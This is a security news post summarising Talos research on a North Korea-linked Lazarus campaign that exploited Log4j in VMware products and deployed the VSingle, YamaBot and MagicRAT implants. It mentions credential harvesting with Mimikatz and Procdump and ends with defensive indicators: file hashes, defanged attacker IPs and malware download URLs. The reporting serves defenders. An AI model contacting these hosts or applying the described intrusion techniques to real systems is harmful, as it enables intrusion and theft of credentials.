September 26, 2022

TheCyberThrone

Thinking Security ! Always

Lazarus Group – APT 39/MAGIC RAT in action

An orchestrated campaign by North Korea-linked Lazarus APT group has been tracked by the researchers, aimed at energy providers aimed at infiltrating organizations and maintain long-term access and exfiltrate data from the victims , including organizations in the US, Canada, and Japan.

The attack chain starts with the exploitation of Log4j vulnerabilities in VMWare products to achieve initial footholds into enterprise networks. Once obtained access to the network, threat actors deployed custom implants tracked as VSingle and YamaBot.

VSingle is an HTTP bot that executes arbitrary code from a remote network. It also downloads and executes plugins. The bot was used to carry out a variety of malicious activities, including reconnaissance, malware deployment, and data exfiltration. YamaBot is a backdoor written in Golang.

The nation-state hackers also employed known malware families, along with the previously unknown malware implant called by MagicRAT. This was partially documented by Symantec and AhnLab earlier this year.

While the infection chain is similar across multiple intrusions in this campaign, there were some key variations that consist of some optional activities conducted by the APT group in different intrusion sets.

Advertisements

Below is the list of variations shared by Talos:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKs proxies.
  • Reverse tunneling tools such as PuTTY’s plink.

This research was documented by researchers from Talos

Indicators of Compromise

VSingle

  • 586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730
  • 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
  • c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
  • dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
  • 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
  • f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
  • 16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5
  • 05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD
  • 6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B
  • 912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9
  • CAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65
  • 2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e
  • 2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780
  • 5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8
  • C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3

IPs

  • 104[.]155[.]149[.]103
  • 40[.]121[.]90[.]194
  • 185[.]29[.]8[.]162
  • 146[.]4[.]21[.]94
  • 46[.]183[.]221[.]109
  • 84[.]38[.]133[.]145
  • 109[.]248[.]150[.]13
  • 155[.]94[.]210[.]11
  • 192[.]186[.]183[.]133
  • 54[.]68[.]42[.]4
  • 84[.]38[.]133[.]145
  • 213[.]180[.]180[.]154

URLS

  • hxxp[://]104[.]155[.]149[.]103/2-443[.]ps1
  • hxxp[://]104[.]155[.]149[.]103/8080[.]ps1
  • hxxp[://]104[.]155[.]149[.]103/mi64[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/mi[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/mm[.]rar
  • hxxp[://]104[.]155[.]149[.]103/pd64[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/rar[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/t[.]tmp
  • hxxp[://]104[.]155[.]149[.]103/update[.]tmp
  • hxxp[://]109[.]248[.]150[.]13:8080/1
  • hxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php
  • hxxp[://]185[.]29[.]8[.]162:443/1[.]tmp
  • hxxp[://]40[.]121[.]90[.]194/11[.]jpg
  • hxxp[://]40[.]121[.]90[.]194/300dr[.]cert
  • hxxp[://]40[.]121[.]90[.]194/b[.]cert
  • hxxp[://]40[.]121[.]90[.]194/qq[.]cert
  • hxxp[://]40[.]121[.]90[.]194/ra[.]cert
  • hxxp[://]40[.]121[.]90[.]194/Rar[.]jpg
  • hxxp[://]40[.]121[.]90[.]194/tt[.]rar
  • hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe
  • hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe
  • hxxp[://]84[.]38[.]133[.]145/board[.]html
  • hxxp[://]84[.]38[.]133[.]145/header[.]xml
  • hxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php
  • hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
  • hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
  • hxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp
  • hxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp
  • hxxps[://]tecnojournals[.]com/review
  • hxxps[://]semiconductboard[.]com/xml
  • hxxp[://]cyancow[.]com/find
  • hxxp[://]155[.]94[.]210[.]11/news/page[.]php
  • hxxp[://]192[.]186[.]183[.]133/bbs/board[.]php
  • hxxp[://]213[.]32[.]46[.]0/board[.]php
  • hxxp[://]54[.]68[.]42[.]4/mainboard[.]php
  • hxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php
  • hxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php
  • hxxp[://]www[.]easyview[.]kr/board/Kheader[.]php
  • hxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php
  • hxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php
%d bloggers like this: